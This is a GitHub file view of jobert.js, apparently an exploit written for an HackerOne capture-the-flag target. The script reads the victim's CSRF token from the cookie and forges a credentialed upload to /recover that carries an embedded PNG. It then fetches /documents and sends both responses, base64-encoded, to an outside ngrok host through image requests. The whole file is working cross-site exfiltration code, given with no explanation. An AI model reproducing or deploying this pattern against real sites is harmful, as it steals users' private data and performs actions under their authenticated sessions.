-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathjobert.js
53 lines (49 loc) · 8.6 KB
/
jobert.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
function send2server(name, data){
img = document.createElement("img");
img.src = "http://b789a781.ngrok.io/??name="+name+"&data="+btoa(encodeURI(data));
document.body.appendChild(img);
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/h1-415.h1ctf.com\/recover", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryQy5BIYMh6n3laSxX");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("Accept-Language", "en-GB,en-US;q=0.9,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryQy5BIYMh6n3laSxX\r\n" +
"Content-Disposition: form-data; name=\"qrcode\"; filename=\"joberts.png\"\r\n" +
"Content-Type: image/png\r\n" +
"\r\n" +
"\x89PNG\r\n" +
"\x1a\n" +
"\x00\x00\x00\rIHDR\x00\x00\x03\x02\x00\x00\x03\x02\x01\x00\x00\x00\x00\xf2\xc7L\x15\x00\x00\x08\xdfIDATx\x9c\xed\x9d\xcdm\xe3H\x10\x85_/\x05\xf8H\x01\x1b\x80C\xa12\x98\x90\x06\x1b\xd2f@\x86\xe2\x0c\xa8\xa3\x01\n" +
"\xb5\x87\xee\xaazM\x19\x8b=\xcc\x90k\xe1\xf1`H\"\xc5\x0f&\xf0T]\xbf]\x0c\xbf\xf7X\xfe\xf8\xcd\x00@\x04\x11D\x10A\x04\x11D\x10A\x04\x11D\x10A\x04\x11\xce!\x94v\\\x80\xa5\x94\xd2}VJ\xb9\xdd/\x00\xf0(X\xae\xa8\xaf\xca\xed^\n" +
"\x10\'p/\xf5\xb3\xfa\xa7~\xed\xd0\xffA\x04\x11D\x00\x00\x98\x99\x19&33[\x073\xb3\r\xc0\xb8\x01\xc0`6c0z5Y\x9c\x18\xcdl\x1e7\xd8\x0c\xc0\xdf\xe6]\xfc\xa6\xf3+\x3c%\x11D\xf8\x3e\x04\xd7\xf4\n" +
"`Z\x07\xf3\xcf6\x98\xe5\xdbup\xfd\x8e\x1bR\xd8\xed\xa7\xa0\xde\xc0\xb5o\xfeJ\x9a\x16A\x84\xff\x03aZ\x81r\x03\x80\xe5\xfa(6\xd7W@\xb9\xdd\xdf\\\xba\xf77\xb3\x19\x8fb\xf3\xbd\x94R\xae\x8fb\x7f\xbd\x7f\x16\x9b\xc7\xad}\xf7\xdf\x08\xbf\xfc\x10A\x04\x11\xfe\x950x\xcazl\xeb\xe7\xf2\xd3\x3e\x8b\x99}V7\x19\x18?\xab\xcb\x8d\xe5\xbd\xad\xbd1}\xbc\x19\xa6\x8f\xcb\x7f\"\xfc\xe2C\x04\x11D\xc8\xc3E8\x1a\x80;\x80\xe5\xfd\xb3\xa0\n" +
"\xfb^`\xb8\xff\xb9\x01\x18\xac\xaax\x9a\x81\xb2\x14\xa0L\x06`\xfa\xb8\xa0L\x1fo\x86\xe5\xc7Vod\xb8\x03\\\xc8\xf2\n" +
"OI\x04\x11\xbe\x1da)\xa5\x94rE3\xb8\xb8_P~\xae\x83\x95\x1b\x80\x1a\xden\xcbn~Unn\xd4\xcb\xcf\x8f\x0b\xca\r@\xb9\xe1\xe1\xf6\xfc\xd8\xffA\x04\x11D\x00Z\x8c,\x0fL\xeb\xe0\xb1\xeb\x15@\xb5\xd85\xbc\xdd\xc2^uQ^C\xe3\x1e7k\x17\xd7\x08Zw(F&\x82\x08\x87\x128\xee\xddrT\x99\x9ejZ\xed.A\r\xa35\xc1bhq3Rr\xdcJ\x9a\x16A\x84\xe3\tn\xa7\xd7\x96|\xae\"\x9e\xc70\xc7\x00\xd2\x1cS\xf2\xaa}\xd6\x92\xd4.\xec\x96\xe9J\xa3.M\x8b \xc2\xb1\x04\xb8B=\xc7\xdc\xfe\xc0\xe3\xd9k+7\xa9\xf67kN\xaa\x01\x8fo`lf\xdb\xbf\x16\xa6\xfc\x15\x9e\x92\x08\"|\x1fB\xf8\xd3YK\xd2jN\xda\xe1\xbesS\xa8\xe7\xb7\xfcl3\xd6me\x9e\x16{\x95\xa6E\x10\xe1\x14\x02\xd7\x86\xe6\x8295=E\xbdh+5\x03\x1b\xe1p\xb4\x9b)\xf7\xef\xa6\xf6\xa5i\x11D8\x96\x10\xf6\xd7\xa3\xd8$\xe7Ph\xab\r\xe5pv+\x04\x1f\xc3\xc6\xaf\x80\xc7\xc2\xd3\xeeK\xd3\"\x88p4!\xec\xf4\x16\xbe3@\xe2\x9c\xe1K\xf1\x8c\x82\xb5\xa0vd\xb0\x10A\xf2\x08\xb2E#\x874-\x82\x08\xc7\x12\x3cF\x86LOy\x97U4cpj+\x83\xda\x11)\x9f=\xbe\xd6\xc2\xe5\x18\xba\xfb\xbd\xc2S\x12A\x84\xefC\xa0\xb8w\xb6_5\x13=f\xca*\xad8G\xc5\xbb\xdf\x83\x88\xaf\xad\xd1\xd8%M\x8b \xc2\xe1\x84\xd0evS\xf6ns\x06\xbb\xbc\x98\x8c\x84\x1d\xcd\xd6\xe9^\xd7\x9b\xce\x80\xfci\x11D8\x83@\xfet\x17\xf76k\xd5\'\xd9\xa6\x05\x80\xabJb\x9d\x9d\xea\xaeQq\x8f\xa0\xc9N\x8b \xc2\t\x04\xcaO7u{\x19I[]\xafO\x06\xdc\x17\xea\xc0\xce\x9f\xf6j\xf0^\xdd\xaf\xf0\x94D\x10\xe1\xfb\x10(2\xe6B\xfc\xc2\x9f\xf6\xb3i\xb6\xfdk\x11(\x8b\xcfv\x89/iZ\x04\x11\x0e%\xf4v:+M@\xa9\xad\xe6E\x8fF\x81n\x16\xb1/\xbb\xf7Yn\xd9i\x11D8\x9e@\x06\xf7y\xb1\xbd\x85j}\xb1\xdd;\xd0-\x99\x8d\xa8#\xebZ4e\xa7E\x10\xe1\x04\x02\xab\xb6\xd9_\xce;s\x04-\x96\xd3\xd1\xc4\xd5:\xb9,\xeb\xbd\xb3|E\xf9i\x11D8\x85\xb0\xb7\xd3\xed\xb35\n" +
"O\xa2\\,\xa6\x8af\x90\x9c\xd6\xe3\xb9\x82\x9f#-&M\x8b \xc2\xf1\x84.\xdam;\x85\xb6\x157\xad\xc7\xfb\xf88\xb9\xcdm\xce\x89Q\xc8L\xfe\xb4\x08\"\x9c@\xe0\x1e\x8e\xc9\x8b\xb4\xf7\xed\xd4\x00\x97\x91\xa0\x9f\x87\xe2o}Q\x9e\xae\xb4\xec\xb4\x08\"\x1cO\xe0\x04\x14\xbd\x8a`\xd7d_\x1c\xab\x7f7lw;F\xfe=\x90\xa6E\x10\xe1\x04\x02\xfb\xd3\xcd\x8b\xe6\xd9\x819\x0e\xa1^\x3c\x03\xe8\x8a\xc3\xa3\x04%\xfc\xe9\xb8\x8b4-\x82\x08\'\x10\xa2\x87c\xd7\xf9\xcc\xbb\xe7tsN\xb2\xa5\xc3\x7f\x00v\xfet\xec\xb5%\x7fZ\x04\x11N \xf4\xf5\xde)\xd3\xbe\x9d\xda\xb3\xd2\xf9\x8a\x1d\xe8\xd1\xc8\x9f\xe6?\xd2\xb4\x08\"\x1cN\xe0(vX\xddz&JE\x8dsT\x16m\xd2\x00\xad\xcc\xb3\xae4n M\x8b \xc2\t\x84n\xed\r|\xa9\xcb\xdc\xc9\xb6]\xb2\xc6$\x93n0\x02\x89=Ck\xd2\xb4\x08\"\x1cJ\xe8\x86\x05f(\x8cR[^%:\x03\xf0\x14\xb6\xd1\x02\x3c\x0b\xc7r\xd7\x3c\x9a\xe3/M\x8b \xc2\xa1\x04\xb2\xc4\x3e\xa8;\xf5\x1bN\xf5h1\t!\xd2\xd5cD\xc6\xb2pl\x05\xe8.\xb2\xd3\"\x88p\x3c\x81\xe6\x9cd\x1d\x99\xe7\x98A\xaf\xd8\x94\xd3Y_\xa8\x7f\xf1V\x9a\x16A\x84\x13\x08\x9dV\x01\xee\xb0\xcc\x9a\x13\x9a\xca_/\xd9-\xd97v\xaf\xeb1\xca\x9f\x16A\x84S\t\xf7\x0b\xaa\xfd]\xae\x8f\x82i\x1d\xac\x94\xf7\x08o\xe3Q\xec\xaf\xf7\xdc\xbe\xd2\x0cK\xb9\xa0\x94\xeb\xa3nV]\xf7\xb9]\xde?K\xab\x10\xff(\xa5\xdc\x0e\xfe\x1fD\x10A\x04dmh7\n" +
"4\x96\xdd4c\x90r\xd1\xe0\xc9\xa0\x88\x02o\xcd#\x13A\x84\xf3\t]\xafeT\x80Q\x91\xc9\xc8\xe5\x9e\xe4m\xe7\x18\xef]\xbaz\x86\xcf8R\xdc[\x04\x11\x8e\'t{\xebd\x91\x18:\xadf\xa9h\xb3\xdd\xdb\xde\xa8\xef\xe7)h\xbe\xb7\x08\"\x9cD\xe8\x1a42\xc6\xbd\x02h\"\xdem\xa6\x13\x89*\xaa\x3c\xe3m\xabe\xa7E\x10\xe1T\x02\xd5\x91u\xe3\xc4\xc0\xf5%\xd4\x9c5v\xfb\xe8L\xd10M\xf5\xde\xc6V\\\x9a\x16A\x84c\t\x3c\xe7$\xc7\x94\x98\xbb\xcd\xd4y5#&\x0b\x8eOa\xb4\\v\xb7\x9b\xaa\x87C\x04\x11\xce!\\\x00\x00\x86\xfb\xa3`\xfa\xfb\xb2\x01\xf7?\xad\xfeY~\x3c.\x00\xde\x0c\xc0\xe3\x02`\xd8\xca4\x0f\xf5\xad-\xd7a\x03\xee\x05\xc0\xf8\xb8\x18\xf0(\xb6\\\xd7\xba\x8c/Y?\xfe\x12OI\x04\x11\xbe\x0f\xe1i_\xcb\x0c\x99\x85u\xe6\n" +
"\x92\xbc.\x8aF\xe3\xadG\xc5\xb7\xae^\xe5\x15\x9e\x92\x08\"|\x1f\xc2S\xe7\xd5\x3e\xc7\xbc\xfa\xa6w\x1c\x15\x1fh2J\xbdK,\xc0I\xf1Z{\x8b \xc2\xf1\x84nFh4M\xd2\x14# \xfa\xb2B\xdd\x94\xc7\xdeMQx\xbe\xb34-\x82\x08\x87\x12x\xff\xe9\x19\x00\xc7\xbe\x3c\x83E\xfb\xe2\xf1\x8a{c\x1b\x9f\xb6{7\xf3[\x9a\x16A\x84C\t\xe4\x1dS\xd8:3\xd5\xb4\x89\xfc\x18%d4\x8f\xack\xa7\xa6\xed\xe4W\xc8\x9f\x16A\x843\x08\xdd,`w\x823\xef\x9c\x89k\x1fs\xd0\xd5\x97\xec\xa6\x02\xe7\x18Q\xd5{\x8b \xc2I\x84~\x9cX7\xec\x84\xfb::\x7f:.\xc9\x808\xed\x8b\x17;w\xc8N\x8b \xc2\t\x84~\x1e\x19[\xe7z6\xd6\xde|\"kC\x01x\xe7FF\xd0\xba\x99\xdf\xd2\xb4\x08\"\x1cJ\xe8f\x01\x8f\x9d\xc5\xce\xb57\xef\x86\x17[Z\xae\x91\xc1\xa2Hyz\xd6\xb2\xd3\"\x88p\n" +
"\x81z-\xd1\xb7O\xe6\xeeW\xe8\r\xf8N\xc9\x14)\x8f\xc8\x98f\x17\x89 \xc2Y\x84\xa7\xfct\x0b\x99\x01\xb4\xc1\xce\xe4\x9fq7e\xbd$\xb4?\xe6\xe4\x7f\xdf\xa6G\x9a\x16A\x84\xe3\t\x9c\xcb\xfa\xea\xc4\x0cW2:g\xb9\xab\x1c\x8d\xb1\xfe.l\xcd\r\x15A\x84\xb3\x08\xfbm4\xba\x89\'-\x94\xcdc\x0e\xfc:\xd0\x86\xb5\xddz\x9c\xcbW\xa4i\x11D8\x9c\xd0\xf5Z\xa6\xc7\x9c\xeb\xe7\x18#\x9a\xcb\xee\xdd\x02|Z\xf9\xe2\xdc\xc8CvZ\x04\x11N t=\x1cQ\xb3\xddW\x85u\xbb\xd1\x1aU\x9fP\xb8\xbc\x1ei\xb65\xe7D\x04\x11\xce!P.\x8bZ\xb2h`\x89\'\xa4\xe9\xa0\x81\xde\xc6s\x8f\xdc\xef\x86\xec\xb4\x08\"\x9cF\xe8\xe3\xde}\xb5H\x94\x9b\x84Bi\xab\x0e\xdeB\x87\x07\x95\xf1\x96Z\xd2\xb4\x08\"\x1cN\xa0\x99\x08@\xd7\x12\x9d5c\xf5h\x8b\xf2\x1c@\x16J\x86\xd7{g]x\xdcY\x9a\x16A\x84c\t\xcf\xbb\xd1\x8e\xbc%\x1e\xb7Zy\xec\xcb\xfb\xb2rs\xbc8\xd2N\xab\x8eL\x04\x11\xce!t\xb9,\x9fs\x92\xfe4\xcd\x08\x8d*\xb3\xaef,\xf7\xb4\x8d\x1f\x85z\x89\xf2\xd3\"\x88p\n" +
"\xe1I\xd3\x008\x03\x1dg-\xaa\xcc2\xdd\xc5}\x95+W\x8e\x92\xce\xa5i\x11D8\x94\xf0l\xa7\xcd\x8cJ;\x9b\xb7\xfd\xa4_\xa3\xc4\x97\x99Q\x85x\xbf\xeb\xa54-\x82\x08\xc7\x12\xf6\xfe4\x8f\x1eZ\x81\xdd\x84\x03\xaa\x01\xaf\xc7h\xad\xe8\x8c\xe3\xe3\x9c\xe9\x92\xa6E\x10\xe1X\xc2\x3e\xee\x8d\x1a\xd4\x8e\xb3\xd9f9\xf7+\xee\xec\x9f\xa6uv\x86\xcc\xe4O\x8b \xc29\x84\xb2o\xdd\xf8\xd5\xc7\xf2\n" +
"OI\x04\x11D\x10A\x04\x11D\x10A\x04\x11D\x10A\x04\x11\xfa\xe3\x1f9s\xc7\x8fg\x01\xbeD\x00\x00\x00\x00IEND\xaeB`\x82\r\n" +
"------WebKitFormBoundaryQy5BIYMh6n3laSxX\r\n" +
"Content-Disposition: form-data; name=\"_csrf_token\"\r\n" +
"\r\n" +
document.cookie.split("_csrf_token=")[1]+
"\r\n" +
"------WebKitFormBoundaryQy5BIYMh6n3laSxX--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.onload = function() {
x = new XMLHttpRequest;
send2server("data", xhr.responseText);
x.open("GET","/documents",true);
x.withCredentials = true;
x.onload = function(){
send2server("data", x.responseText);
}
x.send();
}
xhr.send(new Blob([aBody]));